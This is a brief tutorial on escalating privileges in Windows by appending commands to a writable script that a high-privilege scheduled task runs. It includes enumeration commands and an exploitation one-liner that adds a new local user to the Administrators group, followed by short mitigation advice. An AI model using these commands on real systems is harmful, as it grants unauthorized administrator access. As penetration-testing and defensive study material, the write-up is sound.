Attacks - Windows Privilege Escalation

Exploiting Scheduled Tasks

What Are Scheduled Tasks?

Scheduled Tasks in Windows are automated processes that run at specific times or in response to events, allowing you to schedule programs, scripts, or commands to run without manual input. They help automate tasks like backups, updates, or cleanup, triggered by time or system events. Managed via Task Scheduler or schtasks, they save time, improve efficiency, and simplify task management. Examples include running cleanup scripts, launching apps at startup, or sending reminders. Use Task Scheduler to easily create and manage tasks on your system.

Manual Enumeration

for manual enumeration we could use schtasks:

schtasks /query /fo LIST /V

this will obtain the list for the scheduled task.

or with powershell:

Get-ScheduledTask | Where-Object {$_.Principal.UserId -notlike "*SYSTEM"} | Format-List

Automated Enumeration

  1. Metasploit: exploit/windows/local/scheduled_task
  2. Seatbelt: Seatbelt.exe ScheduledTasks
  3. winPEAS

Exploitation

first we must make sure that we can modify or write to the targeted task and the targeted task is running with high privileges!

accesschk.exe /accepteula -quvw C:\DevTools\CleanUp.ps1

If you see FILE_WRITE_DATA listed, it means you can modify the content of the file (you have write access).

If you see FILE_APPEND_DATA, it means you can append data to the file but may not be able to overwrite existing content.

So Nice, We can embed code in the script, you can do whatever you want I will add a user with high privileges:

echo "net user xle0x Password123! /add && timeout /t 5 && net localgroup Administrators xle0x /add" >> C:\DevTools\CleanUp.ps1

and just wait for the script to run on the time and you will see a new user created with a high privileges.

Mitigation

  1. Perform an audit scan to find out week or misconfiguration with the help of automated script using tools such as WinPeas, SharpUp, etc.

  2. Make sure the scheduled task should not be run as SYSTEM.

Configure scheduled tasks to execute as the authenticated account instead of SYSTEM. The associated Registry key is located at HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl.

The setting can be configured through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > Security Options: Domain Controller: Allow server operators to schedule tasks, set to disabled

Reference: https://attack.mitre.org/techniques/T1053/002/